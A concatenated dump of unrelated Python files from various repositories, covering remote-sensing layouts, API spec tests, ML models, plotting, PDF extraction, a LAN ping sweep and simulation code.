Return True if the acquisition has a S1Acquisition
"""
return self.SENSOR_S1_KEY in self[name]
def has_s2_acquisition(self, name):
"""
Return True if the acquisition has a S2Acquisition
"""
return self.SENSOR_S2_KEY in self[name]
def get_s1_acquisition(self, name):
"""
Return the s1_acquisition of the specified acquisition
name: acquisition name
"""
return self._get_sx_acquisition(name=name, sensor_key=self.SENSOR_S1_KEY)
def get_s2_acquisition(self, name):
"""
Return the s2_acquisition of the specified acquisition
name: acquisition name
"""
return self._get_sx_acquisition(name=name, sensor_key=self.SENSOR_S2_KEY)
def summarize(self):
"""
This function summarizes the acquisition layout, displaying a nice table
Example:
Cresson et al. layout:
| t-1 | t | t+1
----------------+----------------+----------------+----------------
S1 | / | +/-24h | /
----------------+----------------+----------------+----------------
S2 | [-360h, -120h] | [0h, 0h] | [120h, 360h]
| 0-0% cld. | 0-0% cld. | 0-0% cld.
"""
max_head_len = max([len(key) for key in self] + [16])
def _cell(msg):
return msg.center(max_head_len, " ")
def _round_hours(n_seconds):
return "{}h".format(int(n_seconds / 3600))
def _summarize_timerange(n_seconds_1, n_seconds_2):
ts_min = min(n_seconds_1, n_seconds_2)
ts_max = max(n_seconds_1, n_seconds_2)
return "[{}, {}]".format(_round_hours(ts_min), _round_hours(ts_max))
def _cell_s1(key):
content = "/"
if self.has_s1_acquisition(key):
delta = self.get_s1s2_max_timestamp_delta(key)
content = "+/-{}".format(_round_hours(delta))
return _cell(content)
def _cell_s2(key):
content = "/"
if self.has_s2_acquisition(key):
ts_begin, ts_end = self.get_timestamp_range(key)
content = _summarize_timerange(ts_begin, ts_end)
return _cell(content)
def _cell_s2b(key):
content = "/"
if self.has_s2_acquisition(key):
s2_acquisition = self.get_s2_acquisition(key)
content = "{}-{}% cld.".format(s2_acquisition.min_cloud_percent, s2_acquisition.max_cloud_percent)
return _cell(content)
keys = self.keys()
headers = [_cell("")] + [_cell(key) for key in keys]
line1 = [_cell("S1")] + [_cell_s1(key) for key in keys]
line2 = [_cell("S2")] + [_cell_s2(key) for key in keys]
line3 = [_cell("")] + [_cell_s2b(key) for key in keys]
horizontal_line = "+".join(["-" * max_head_len for k in range(len(keys) + 1)])
msg = "|".join(headers)
msg += "\n" + horizontal_line
msg += "\n" + "|".join(line1)
msg += "\n" + horizontal_line
msg += "\n" + "|".join(line2)
msg += "\n" + "|".join(line3)
print(msg)
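if __name__ == '__main__':
    # Minimal sketch of building a layout like the one shown in the summarize()
    # docstring; the cloud-percentage bounds and the 24h S1/S2 gap are assumed
    # values chosen only for illustration.
    layout = AcquisitionsLayout()
    layout.new_acquisition('t', s1_acquisition=S1Acquisition(),
                           s2_acquisition=S2Acquisition(0, 0),
                           max_s1s2_gap_hours=24, timeframe_origin=True)
    layout.new_acquisition('t-1', s2_acquisition=S2Acquisition(0, 0),
                           timeframe_start_hours=-360, timeframe_end_hours=-120)
    layout.new_acquisition('t+1', s2_acquisition=S2Acquisition(0, 0),
                           timeframe_start_hours=120, timeframe_end_hours=360)
    layout.summarize()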
| 1.6875 | 2 |
tests/spec/Spec/flattened_spec_test.py | Timothyyung/bravado-core | 0 | 12796778 | <gh_stars>0
# -*- coding: utf-8 -*-
import copy
import functools
import mock
import pytest
from six.moves.urllib.parse import urlparse
from swagger_spec_validator import validator20
from bravado_core import spec
from bravado_core.spec import CONFIG_DEFAULTS
from bravado_core.spec import Spec
from bravado_core.spec_flattening import _marshal_uri
from bravado_core.spec_flattening import _SpecFlattener
@pytest.fixture
def spec_flattener(minimal_swagger_spec):
return _SpecFlattener(
swagger_spec=minimal_swagger_spec,
marshal_uri_function=functools.partial(
_marshal_uri,
origin_uri=None,
),
)
@mock.patch('bravado_core.spec_flattening.warnings')
def test_no_warning_for_clashed_uris(mock_warnings, spec_flattener):
spec_flattener.warn_if_uri_clash_on_same_marshaled_representation({})
@mock.patch('bravado_core.spec_flattening.warnings')
def test_warning_for_clashed_uris(mock_warnings, spec_flattener):
clashing_uris = ['path1', 'path2']
marshaled_uri = 'SameString'
spec_flattener.marshal_uri_function = functools.partial(
lambda *args, **kwargs: marshaled_uri,
origin_uri=None,
)
spec_flattener.warn_if_uri_clash_on_same_marshaled_representation(
uri_schema_mappings={urlparse(uri): mock.Mock() for uri in clashing_uris},
)
mock_warnings.warn.assert_called_once_with(
message='{} clashed to {}'.format(', '.join(sorted(clashing_uris)), marshaled_uri),
category=Warning,
)
@pytest.mark.parametrize(
'target',
[
'',
'xhttps://host/file',
]
)
def test_marshal_url_exceptions(target):
with pytest.raises(ValueError) as excinfo:
_marshal_uri(
target_uri=urlparse(target),
origin_uri=None,
)
assert 'Invalid target: \'{target}\''.format(target=target) in str(excinfo.value)
@pytest.mark.parametrize(
'target, expected_marshaled_uri',
[
('/api_docs/file_same_directory.json', 'file:......api_docs..file_same_directory.json'),
('file:///api_docs/file_same_directory.json', 'file:......api_docs..file_same_directory.json'),
('file:///file_on_previous_directory.json', 'file:......file_on_previous_directory.json'),
('file:///directory1/file.json', 'file:......directory1..file.json'),
('http://www.service.domain/swagger/specs.json', 'http:....www.service.domain..swagger..specs.json'),
('https://www.service.domain/swagger/specs.json', 'https:....www.service.domain..swagger..specs.json'),
('/api_docs/file.json#/definitions/object', 'file:......api_docs..file.json|..definitions..object'),
('http://host/file.json#/definitions/wired|name', 'http:....host..file.json|..definitions..wired|name'),
]
)
def test_marshal_url_no_origin_uri(target, expected_marshaled_uri):
marshaled_uri = _marshal_uri(
target_uri=urlparse(target),
origin_uri=None,
)
assert marshaled_uri == expected_marshaled_uri
@pytest.mark.parametrize(
'target, expected_marshaled_uri',
[
('/api_docs/file_same_directory.json', 'lfile:file_same_directory.json'),
('file:///api_docs/file_same_directory.json', 'lfile:file_same_directory.json'),
('file:///file_on_previous_directory.json', 'lfile:....file_on_previous_directory.json'),
('file:///directory1/file.json', 'lfile:....directory1..file.json'),
('http://www.service.domain/swagger/specs.json', 'http:....www.service.domain..swagger..specs.json'),
('https://www.service.domain/swagger/specs.json', 'https:....www.service.domain..swagger..specs.json'),
('/api_docs/file.json#/definitions/object', 'lfile:file.json|..definitions..object'),
('http://host/file.json#/definitions/wired|name', 'http:....host..file.json|..definitions..wired|name'),
]
)
def test_marshal_url(target, expected_marshaled_uri):
origin_url = '/api_docs/swagger.json'
marshaled_uri = _marshal_uri(
target_uri=urlparse(target),
origin_uri=urlparse(origin_url),
)
assert marshaled_uri == expected_marshaled_uri
@mock.patch('bravado_core.spec.log', autospec=True)
def test_flattened_spec_warns_if_configured_to_not_validate_swagger_specs(
mock_log, minimal_swagger_dict,
):
petstore_spec = Spec.from_dict(minimal_swagger_dict, '', config=dict(CONFIG_DEFAULTS, validate_swagger_spec=False))
assert petstore_spec.flattened_spec == minimal_swagger_dict
mock_log.warning.assert_called_once_with(
'Flattening unvalidated specs could produce invalid specs. '
'Use it at your risk or enable `validate_swagger_specs`',
)
@pytest.mark.parametrize(
'has_origin_url', [True, False]
)
@mock.patch('bravado_core.spec_flattening.warnings')
@mock.patch('bravado_core.spec.build_http_handlers')
@mock.patch('bravado_core.spec.flattened_spec', wraps=spec.flattened_spec)
def test_flattened_spec_warning_if_no_origin_url(
wrap_flattened_spec, mock_build_http_handlers, mock_warnings, petstore_spec, has_origin_url,
):
if not has_origin_url:
petstore_spec.origin_url = None
petstore_spec.flattened_spec
wrap_flattened_spec.assert_called_once_with(swagger_spec=petstore_spec)
if has_origin_url:
assert not mock_warnings.warn.called
else:
mock_warnings.warn.assert_called_once_with(
message='It is recommended to set origin_url to your spec before flattering it. '
'Doing so internal paths will be hidden, reducing the amount of exposed information.',
category=Warning,
)
@mock.patch('bravado_core.spec.warnings')
@mock.patch('bravado_core.spec.build_http_handlers')
@mock.patch('bravado_core.spec.flattened_spec')
def test_flattened_spec_cached_result(mock_flattened_spec, mock_build_http_handlers, mock_warnings, petstore_spec):
petstore_spec.flattened_spec
petstore_spec.flattened_spec
assert mock_flattened_spec.call_count == 1
def test_flattened_spec_provide_valid_specs(
flattened_multi_file_recursive_dict, multi_file_recursive_spec,
):
flattened_spec = multi_file_recursive_spec.flattened_spec
validator20.validate_spec(
# Deep copy needed because validate_spec adds x-scope information
spec_dict=copy.deepcopy(flattened_spec),
spec_url='',
http_handlers={},
)
assert flattened_spec == flattened_multi_file_recursive_dict
def test_flattened_specs_with_no_xmodel_tags(multi_file_with_no_xmodel_spec, flattened_multi_file_with_no_xmodel_dict):
flattened_spec = multi_file_with_no_xmodel_spec.flattened_spec
validator20.validate_spec(
# Deep copy needed because validate_spec adds x-scope information
spec_dict=copy.deepcopy(flattened_spec),
spec_url='',
http_handlers={},
)
assert flattened_spec == flattened_multi_file_with_no_xmodel_dict
@pytest.mark.parametrize(
'spec_dict, expected_spec_dict',
[
[
{
'definitions': {
'model': {
'type': 'object',
'x-model': 'model',
},
},
},
{
'definitions': {
'model': {
'type': 'object',
'x-model': 'model',
},
},
},
],
[
{
'definitions': {
'model': {
'type': 'object',
'x-model': 'different-model',
},
},
},
{
'definitions': {
'different-model': {
'type': 'object',
'x-model': 'different-model',
},
},
},
],
[
{
'definitions': {
'model': {
'type': 'object',
'x-model': 'different-model',
},
'different-model': {
'type': 'string',
},
},
},
{
'definitions': {
'model': {
'type': 'object',
'x-model': 'different-model',
},
'different-model': {
'type': 'string',
},
},
},
],
[
{
'definitions': {
'model': {
'type': 'object',
'properties': {
'mod': {
'$ref': '#/definitions/model'
}
},
'x-model': 'different-model',
},
},
},
{
'definitions': {
'different-model': {
'type': 'object',
'properties': {
'mod': {
'$ref': '#/definitions/different-model'
}
},
'x-model': 'different-model',
},
},
},
],
[
{
'definitions': {
'model': {
'type': 'object',
'properties': {
'mod': {
'$ref': '#/definitions/second-model'
}
},
'x-model': 'different-model',
},
'second-model': {
'type': 'object',
'properties': {
'mod': {
'$ref': '#/definitions/model'
}
},
'x-model': 'second-model',
},
},
},
{
'definitions': {
'different-model': {
'type': 'object',
'properties': {
'mod': {
'$ref': '#/definitions/second-model'
}
},
'x-model': 'different-model',
},
'second-model': {
'type': 'object',
'properties': {
'mod': {
'$ref': '#/definitions/different-model'
}
},
'x-model': 'second-model',
},
},
},
],
]
)
def test_rename_definition_references(spec_flattener, spec_dict, expected_spec_dict):
assert spec_flattener.rename_definition_references(spec_dict) == expected_spec_dict
def test_referenced_and_discovered_models_are_not_lost_after_flattening(simple_crossfer_spec):
assert simple_crossfer_spec.flattened_spec['definitions']['pong']['x-model'] == 'pong'
| 1.890625 | 2 |
nnreslib/layers/trainable_layer.py | xausssr/nnreslib | 0 | 12796779 | <reponame>xausssr/nnreslib<gh_stars>0
from __future__ import annotations
from abc import abstractmethod
from typing import TYPE_CHECKING, Any, Optional
from .base_layer import Layer
from ..utils.initialization import Initialization
from ..utils.merge import MergeInputs
if TYPE_CHECKING:
import numpy as np
from ..utils.types import ActivationFunctions, Shape
class TrainableLayer(Layer):
# pylint:disable=unused-argument
def __init__(
self,
name: str,
activation: ActivationFunctions,
merge: Optional[MergeInputs] = None,
initializer: Initialization = Initialization(),
is_out: bool = False,
**kwargs: Any,
) -> None:
super().__init__(name, merge=merge, is_out=is_out, **kwargs)
self.initializer = initializer
self.activation = activation
self._weights: Optional[np.ndarray] = None
self._biases: Optional[np.ndarray] = None
@property
@abstractmethod
def weights_shape(self) -> Shape:
...
@property
def weights(self) -> np.ndarray:
if self._weights is None:
raise ValueError(f"Weights of layer {self.name} is not initialized")
return self._weights
def set_weights(self, data_mean: float = 0.0, data_std: float = 0.0) -> None:
self._weights = self.initializer.init_weights(self, data_mean, data_std)
@property
@abstractmethod
def biases_shape(self) -> Shape:
...
@property
def biases(self) -> np.ndarray:
if self._biases is None:
raise ValueError(f"Biases of layer {self.name} is not initialized")
return self._biases
def set_biases(self, data_mean: float = 0.0, data_std: float = 0.0) -> None:
self._biases = self.initializer.init_biases(self, data_mean, data_std)
| 2.09375 | 2 |
src/figs/figS03.py | RPGroup-PBoC/chann_cap | 2 | 12796780 | #%%
import os
import pickle
import cloudpickle
import itertools
import glob
import numpy as np
import scipy as sp
import pandas as pd
import git
# Import matplotlib stuff for plotting
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib as mpl
# Seaborn, useful for graphics
import seaborn as sns
# Import the project utils
import ccutils
# Set PBoC plotting format
ccutils.viz.set_plotting_style()
# Increase dpi
#%%
# Find home directory for repo
repo = git.Repo("./", search_parent_directories=True)
homedir = repo.working_dir
# Define directories for data and figure
figdir = f'{homedir}/fig/si/'
datadir = f'{homedir}/data/mRNA_FISH/'
mcmcdir = f'{homedir}/data/mcmc/'
# %%
# Read the data
df = pd.read_csv(f'{datadir}Jones_Brewster_2014.csv', index_col=0)
# Extract the lacUV5 data
dfUV5 = df[df.experiment == 'UV5']
# Load the flat-chain
with open(f'{mcmcdir}lacUV5_constitutive_mRNA_prior.pkl', 'rb') as file:
unpickler = pickle.Unpickler(file)
gauss_flatchain = unpickler.load()
gauss_flatlnprobability = unpickler.load()
# Generate a Pandas Data Frame with the mcmc chain
index = ['kp_on', 'kp_off', 'rm']
# Generate a data frame out of the MCMC chains
df_mcmc = pd.DataFrame(gauss_flatchain, columns=index)
# redefine the index with the new entries
index = df_mcmc.columns
# MAP (maximum a posteriori) value of the parameters
max_idx = np.argmax(gauss_flatlnprobability, axis=0)
kp_on, kp_off, rm = df_mcmc.iloc[max_idx, :]
# Define bins
bins = np.arange(0, dfUV5.mRNA_cell.max())
logp_mRNA = ccutils.model.log_p_m_unreg(bins, kp_on, kp_off, 1, rm)
# Plot the histogram of the data with bins of width 1
_ = plt.hist(dfUV5.mRNA_cell, bins=bins, density=1, histtype='stepfilled',
alpha=1, label='sm-FISH data', align='left', lw=0)
plt.step(bins, np.exp(logp_mRNA), color='r', ls='-', lw=1.5,
label='two-state promoter fit')
# Label the plot
plt.xlabel('mRNA / cell')
plt.ylabel('probability')
plt.legend()
plt.tight_layout()
plt.savefig(f'{figdir}/figS03.pdf', bbox_inches='tight')
| 2.15625 | 2 |
ip_search.py | HAYASAKA-Ryosuke/ip_search | 0 | 12796781 | <gh_stars>0
#!coding:utf-8
from multiprocessing import Pool
import subprocess
class Ping(object):
def __init__(self, hosts, pool_num=5):
self.hosts = hosts
self.pool_num = pool_num
def _shell(self, host):
popen = subprocess.Popen(["ping", "-c", "1", "-W", "0", host], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out = popen.communicate()
if not ("1 packets transmitted, 0 packets received, 100.0% packet loss" in str(out[0])):
print(host)
return host
def send(self):
p = Pool(self.pool_num)
return p.map(self._shell, self.hosts)
if __name__ == '__main__':
hosts = ['192.168.' + str(num1) + '.' + str(num2) for num1 in range(255) for num2 in range(255)]
ping = Ping(hosts)
ping.send()
| 2.984375 | 3 |
checkpoint.py | nisarkhanatwork/mctsnet | 5 | 12796782 | import pickle
import time
from datetime import datetime
def checkpoint(shared_model, shared_dataset, args):
try:
while True:
# Save dataset
file = open(args.data, 'wb')
pickle.dump(list(shared_dataset), file)
file.close()
# Save model
now = datetime.now().strftime("%d_%m_%H_%M")
shared_model.save('models/checkpoint_{}.model'.format(now))
time.sleep(10 * 60)
except KeyboardInterrupt:
print('exiting checkpoint')
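# Minimal usage sketch, assuming `shared_model`, `shared_dataset` and `args`
# (with an `args.data` path) come from the training script; checkpoint() is
# meant to run in a background process alongside training:
#
#   from multiprocessing import Process
#   saver = Process(target=checkpoint, args=(shared_model, shared_dataset, args))
#   saver.start()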
| 2.78125 | 3 |
msdm/tests/test_policy_iteration.py | markkho/msdm | 15 | 12796783 | import unittest
import numpy as np
from frozendict import frozendict
from msdm.core.distributions import DictDistribution
from msdm.algorithms import ValueIteration, PolicyIteration, LRTDP
from msdm.tests.domains import Counter, GNTFig6_6, Geometric, VaryingActionNumber, make_russell_norvig_grid
from msdm.domains import GridWorld
class MyTestCase(unittest.TestCase):
def test_policy_iteration(self):
mdp = Counter(3)
res = PolicyIteration().plan_on(mdp)
out = res.policy.run_on(mdp)
assert out.state_traj == (0, 1, 2)
assert out.action_traj == (1, 1, 1)
assert res.policy.action(0) == 1
assert res.policy.action(1) == 1
assert res.policy.action(2) == 1
def test_policy_iteration_geometric(self):
mdp = Geometric(p=1/13)
res = PolicyIteration(iterations=500).plan_on(mdp)
assert np.isclose(res.V[0], -13), res.V
def test_policy_iteration_varying_action_number(self):
mdp = VaryingActionNumber()
res = PolicyIteration().plan_on(mdp)
assert np.isclose(res.V[0], -2), res.V
assert res.policy.run_on(mdp).action_traj == (+1, +1)
def test_equal_value(self):
'''
In this MDP, the value at the non-initial, non-terminal corners is equal.
This means the policy at the start state should assign equal probability
to either.
'''
mdp = GridWorld(
tile_array=[
'.g',
's.',
],
feature_rewards={'g': 0},
step_cost=-1,
)
res = PolicyIteration().plan_on(mdp)
assert np.isclose(res.V[frozendict(x=0, y=1)], res.V[frozendict(x=1, y=0)])
assert res.policy.action_dist(frozendict(x=0, y=0)).\
isclose(DictDistribution({
frozendict({'dx': 0, 'dy': 0}): 0,
frozendict({'dx': 1, 'dy': 0}): 1/2,
frozendict({'dx': -1, 'dy': 0}): 0,
frozendict({'dy': 1, 'dx': 0}): 1/2,
frozendict({'dy': -1, 'dx': 0}): 0
}))
assert res.policy.action_dist(frozendict(x=0, y=1)).isclose(DictDistribution({
frozendict({'dx': 1, 'dy': 0}): 1,
}))
def test_policy_iteration_gridworld(self):
gw = GridWorld(
tile_array=[
'......g',
'...####',
'..##...',
'..#....',
'.......',
'####...',
's......',
])
pi_res = PolicyIteration()(gw)
vi_res = ValueIteration()(gw)
lrtdp = LRTDP()(gw)
assert pi_res.initial_value == vi_res.initial_value == lrtdp.initial_value
def test_policy_iteration_gridworld2(self):
gw = GridWorld((
'..g..',
'.###.',
'..#..',
'..s..'
), discount_rate=1 - 1e-5)
pi = PolicyIteration().plan_on(gw)
vi = ValueIteration().plan_on(gw)
reachable = sorted(gw.reachable_states(),
key=lambda s: (s['x'], s['y']))
pi_mat = pi.policy.as_matrix(reachable, gw.action_list)
vi_mat = vi.policy.as_matrix(reachable, gw.action_list)
assert (pi_mat == vi_mat).all()
assert all([np.isclose(pi.valuefunc[s], vi.valuefunc[s])
for s in reachable])
def test_policy_iteration_and_value_iteration_russell_norvig(self):
for discount_rate in [i/10 for i in range(1, 10)] + [.95, .99, 1.0]:
for slip_prob in [i/10 for i in range(1, 10)] + [.95, .99, 1.0]:
gw = make_russell_norvig_grid(
discount_rate=discount_rate,
slip_prob=slip_prob,
)
vi_res = ValueIteration(iterations=int(1e3)).plan_on(gw)
pi_res = PolicyIteration(iterations=int(1e3)).plan_on(gw)
assert np.isclose(vi_res._qvaluemat, pi_res._qvaluemat, atol=5e-4).all()
def test_policy_iteration_heavenorhell(self):
# technically a pomdp, but we can solve underlying mdp
from msdm.domains.heavenorhell import HeavenOrHell
for discount_rate in [i/10 for i in range(1, 10, 2)] + [.95, .99, .99999]:
for coherence in [i/10 for i in range(1, 10, 2)] + [.95, .99, .99999]:
print(discount_rate, coherence)
hh = HeavenOrHell(
coherence=coherence,
grid=
"""
hcg
#.#
#s#
""",
discount_rate=discount_rate,
heaven_reward=50,
hell_reward=-50,
)
pi = PolicyIteration().plan_on(hh)
vi = ValueIteration().plan_on(hh)
reachable = sorted(hh.reachable_states())
pi_mat = pi.policy.as_matrix(reachable, hh.action_list)
vi_mat = vi.policy.as_matrix(reachable, hh.action_list)
assert (pi_mat == vi_mat).all()
assert all([np.isclose(pi.valuefunc[s], vi.valuefunc[s])
for s in reachable])
if __name__ == '__main__':
unittest.main()
| 2.3125 | 2 |
languages/python3/pdf/pdfminer/main.py | jcnaud/snippet | 5 | 12796784 | <reponame>jcnaud/snippet<gh_stars>1-10
# coding: utf-8
## Source : https://lobstr.io/index.php/2018/07/30/scraping-document-pdf-python-pdfminer/
import os
from io import BytesIO
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import TextConverter
from pdfminer.pdfpage import PDFPage
def pdf2txt(path):
"""
Extract text from PDF file, and return
the string contained inside
    :param path: (str) path to the .pdf file
:return: text (str) string extracted
"""
rsrcmgr = PDFResourceManager()
retstr = BytesIO()
device = TextConverter(rsrcmgr, retstr)
with open(path, "rb") as fp: # open in 'rb' mode to read PDF bytes
interpreter = PDFPageInterpreter(rsrcmgr, device)
for page in PDFPage.get_pages(fp, check_extractable=True):
interpreter.process_page(page)
device.close()
text = retstr.getvalue()
retstr.close()
return text.decode('utf-8')
def main():
print(pdf2txt('./simple1.pdf'))
if __name__ == '__main__':
main()
| 3.09375 | 3 |
osp/institutions/utils.py | davidmcclure/open-syllabus-project | 220 | 12796785 | <reponame>davidmcclure/open-syllabus-project
import tldextract
import re
from urllib.parse import urlparse
def seed_to_regex(seed):
"""
Given a URL, make a regex that matches child URLs.
Args:
seed (str)
Returns: regex
"""
parsed = urlparse(seed)
# 1 -- If the seed has a non-www subdomain, require a matching subdomain.
subdomain = ''
tld = tldextract.extract(seed)
if tld.subdomain and tld.subdomain != 'www':
subdomain = '[./]'+tld.subdomain
    # 2 -- Require the registered domain, e.g. yale.edu.
netloc = '[./]{0}.{1}'.format(tld.domain, tld.suffix)
# 3 -- If a path is present, require a sub-path.
path = ''
clean_path = parsed.path.rstrip('/')
if clean_path:
path = re.escape(clean_path+'/')
# Join the parts.
pattern = ''.join([subdomain, netloc, path])
return re.compile(pattern, re.I)
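# Illustrative example of the pattern produced for a seed with a subdomain and
# a path (the URLs are made up for the example):
#
#   pattern = seed_to_regex('http://history.yale.edu/courses')
#   bool(pattern.search('http://history.yale.edu/courses/hist-101'))  # True
#   bool(pattern.search('http://art.yale.edu/'))                      # False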
def strip_csv_row(row):
"""
    Strip values in a CSV row, casting '' -> None.
"""
return {
key: val.strip() or None
for key, val in row.items()
}
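# Illustrative example (values are made up):
#
#   strip_csv_row({'name': '  Yale  ', 'city': ''})
#   # -> {'name': 'Yale', 'city': None}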
| 3.515625 | 4 |
users/signals.py | LouaiKB/MicroscoQuiz | 2 | 12796786 | <reponame>LouaiKB/MicroscoQuiz<gh_stars>1-10
# This file is created for the signals: for each new user, create a new Profile
from django.db.models.signals import post_save
from django.contrib.auth.models import User
from django.dispatch import receiver
from .models import Profile
# when a user is saved, send this signal, which will be received by this
# receiver; the receiver is the create_profile function below
@receiver(post_save, sender=User)
def create_profile(sender, instance, created, **kwargs):
if created:
Profile.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_profile(sender, instance, **kwargs):
instance.profile.save() | 2.609375 | 3 |
jiant/jiant/modules/cove/cove/encoder.py | amirziai/cs229-project | 500 | 12796787 | <gh_stars>100-1000
import os
import torch
from torch import nn
from torch.nn.utils.rnn import pad_packed_sequence as unpack
from torch.nn.utils.rnn import pack_padded_sequence as pack
import torch.utils.model_zoo as model_zoo
model_urls = {
'wmt-lstm' : 'https://s3.amazonaws.com/research.metamind.io/cove/wmtlstm-8f474287.pth'
}
MODEL_CACHE = os.path.join(os.path.dirname(os.path.realpath(__file__)), '.torch')
class MTLSTM(nn.Module):
def __init__(self, n_vocab=None, vectors=None, residual_embeddings=False, layer0=False, layer1=True, trainable=False, model_cache=MODEL_CACHE):
"""Initialize an MTLSTM. If layer0 and layer1 are True, they are concatenated along the last dimension so that layer0 outputs
contribute the first 600 entries and layer1 contributes the second 600 entries. If residual embeddings is also true, inputs
are also concatenated along the last dimension with any outputs such that they form the first 300 entries.
Arguments:
n_vocab (int): If not None, initialize MTLSTM with an embedding matrix with n_vocab vectors
vectors (Float Tensor): If not None, initialize embedding matrix with specified vectors (These should be 300d CommonCrawl GloVe vectors)
            residual_embeddings (bool): If True, concatenate the input GloVe embeddings with the contextualized word vectors as the final output
layer0 (bool): If True, return the outputs of the first layer of the MTLSTM
layer1 (bool): If True, return the outputs of the second layer of the MTLSTM
trainable (bool): If True, do not detach outputs; i.e. train the MTLSTM (recommended to leave False)
model_cache (str): path to the model file for the MTLSTM to load pretrained weights (defaults to the best MTLSTM from (McCann et al. 2017) --
that MTLSTM was trained with 300d 840B GloVe on the WMT 2017 machine translation dataset.
"""
super(MTLSTM, self).__init__()
self.layer0 = layer0
self.layer1 = layer1
self.residual_embeddings = residual_embeddings
self.trainable = trainable
self.embed = False
if n_vocab is not None:
self.embed = True
self.vectors = nn.Embedding(n_vocab, 300)
if vectors is not None:
self.vectors.weight.data = vectors
state_dict = model_zoo.load_url(model_urls['wmt-lstm'], model_dir=model_cache)
if layer0:
layer0_dict = {k: v for k, v in state_dict.items() if 'l0' in k}
self.rnn0 = nn.LSTM(300, 300, num_layers=1, bidirectional=True, batch_first=True)
self.rnn0.load_state_dict(layer0_dict)
if layer1:
layer1_dict = {k.replace('l1', 'l0'): v for k, v in state_dict.items() if 'l1' in k}
self.rnn1 = nn.LSTM(600, 300, num_layers=1, bidirectional=True, batch_first=True)
self.rnn1.load_state_dict(layer1_dict)
elif layer1:
self.rnn1 = nn.LSTM(300, 300, num_layers=2, bidirectional=True, batch_first=True)
self.rnn1.load_state_dict(model_zoo.load_url(model_urls['wmt-lstm'], model_dir=model_cache))
else:
raise ValueError('At least one of layer0 and layer1 must be True.')
def forward(self, inputs, lengths, hidden=None):
"""
Arguments:
inputs (Tensor): If MTLSTM handles embedding, a Long Tensor of size (batch_size, timesteps).
Otherwise, a Float Tensor of size (batch_size, timesteps, features).
            lengths (Long Tensor): lengths of each sequence for handling padding
hidden (Float Tensor): initial hidden state of the LSTM
"""
if self.embed:
inputs = self.vectors(inputs)
if not isinstance(lengths, torch.Tensor):
lengths = torch.Tensor(lengths).long()
if inputs.is_cuda:
with torch.cuda.device_of(inputs):
lengths = lengths.cuda(torch.cuda.current_device())
lens, indices = torch.sort(lengths, 0, True)
outputs = [inputs] if self.residual_embeddings else []
len_list = lens.tolist()
packed_inputs = pack(inputs[indices], len_list, batch_first=True)
if self.layer0:
outputs0, hidden_t0 = self.rnn0(packed_inputs, hidden)
unpacked_outputs0 = unpack(outputs0, batch_first=True)[0]
_, _indices = torch.sort(indices, 0)
unpacked_outputs0 = unpacked_outputs0[_indices]
outputs.append(unpacked_outputs0)
packed_inputs = outputs0
if self.layer1:
outputs1, hidden_t1 = self.rnn1(packed_inputs, hidden)
unpacked_outputs1 = unpack(outputs1, batch_first=True)[0]
_, _indices = torch.sort(indices, 0)
unpacked_outputs1 = unpacked_outputs1[_indices]
outputs.append(unpacked_outputs1)
outputs = torch.cat(outputs, 2)
return outputs if self.trainable else outputs.detach()
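# Minimal usage sketch, assuming pre-embedded 300d GloVe inputs; the tensor
# shapes below are arbitrary and the pretrained weights are fetched on first use.
#
#   model = MTLSTM()                      # layer1 outputs only (600d per token)
#   glove = torch.randn(2, 5, 300)        # (batch, timesteps, features) stand-in
#   lengths = torch.tensor([5, 3])
#   cove_vectors = model(glove, lengths)  # -> shape (2, 5, 600)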
| 2.5 | 2 |
tests/test_autommittee.py | rodsenra/socialgraph | 0 | 12796788 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Test some edge cases.
"""
import unittest
from socialgraph import autommittee
class TestPowerHistory(unittest.TestCase):
def setUp(self):
self.G = autommittee.Graph()
self.G.add_edge('b', 'a')
self.G.add_edge('a', 'c')
self.G.add_edge('d', 'c')
self.G.add_edge('e', 'c')
self.G.add_edge('c', 'a')
def tearDown(self):
del self.G
def test_calc_power(self):
self.assertEqual([('a', 1), ('b', 2), ('c', 5)], self.G._nodes['a'].full_power())
self.assertEqual([('c', 1), ('a', 3), ('d', 4), ('e', 5)], self.G._nodes['c'].full_power()) | 2.953125 | 3 |
pycbio/hgdata/frame.py | diekhans/read-through-analysis | 0 | 12796789 | <filename>pycbio/hgdata/frame.py
# Copyright 2006-2012 <NAME>
from pycbio.sys import PycbioException
class Frame(int):
"""Immutable object the represents a frame, integer value of 0, 1, or 2.
This is also an int. Use None if there is no frame."""
__slots__ = ()
@staticmethod
def _checkFrameValue(val):
if not ((val >= 0) and (val <= 2)):
raise TypeError("frame must be an integer in the range 0..2, got {}".format(val))
def __new__(cls, val):
obj = super(Frame, cls).__new__(cls, val)
cls._checkFrameValue(obj)
return obj
@staticmethod
def fromPhase(phase):
"""construct a Frame from a GFF/GTF like phase, which maybe an int or str"""
if isinstance(phase, str):
phase = int(phase)
if phase == 0:
return Frame(0)
elif phase == 1:
return Frame(2)
elif phase == 2:
return Frame(1)
else:
raise PycbioException("invalid phase: {}".format(phase))
def toPhase(self):
"""frame expressed as a GFF/GTF like phase, which is the number of bases
to the start of the next codon"""
if self == 0:
return 0
elif self == 1:
return 2
else:
return 1
def incr(self, amt):
"""increment frame by positive or negative amount, returning a new
        Frame object."""
if not isinstance(amt, int):
raise ValueError("can only increment a frame by an int value: {} {}".format(type(amt), amt))
val = int(self) # prevent infinite recursion
if amt >= 0:
return Frame((val + amt) % 3)
else:
amt3 = (-amt) % 3
return Frame((val - (amt - amt3)) % 3)
def __add__(self, amt):
return self.incr(amt)
def __sub__(self, amt):
return self.incr(-amt)
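if __name__ == "__main__":
    # Minimal sketch of the frame/phase relationship and wrap-around arithmetic
    # defined above.
    f = Frame.fromPhase(2)      # GFF phase 2 corresponds to frame 1
    assert f == 1 and f.toPhase() == 2
    assert f + 2 == Frame(0)    # frame arithmetic wraps modulo 3
    assert Frame(0) - 1 == Frame(2)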
| 2.78125 | 3 |
spike_swarm_sim/objects/robot.py | r-sendra/SpikeSwarmSim | 0 | 12796790 | <filename>spike_swarm_sim/objects/robot.py
import numpy as np
from shapely.geometry import Point
from spike_swarm_sim.objects import WorldObject
from spike_swarm_sim.register import sensors, actuators, world_object_registry
@world_object_registry(name='robot')
class Robot(WorldObject):
"""
Base class for the robot world object.
"""
def __init__(self, pos, *args, orientation=0, **kwargs):
super(Robot, self).__init__(pos=pos, static=False, luminous=False,\
tangible=True, shape='circular', *args, **kwargs)
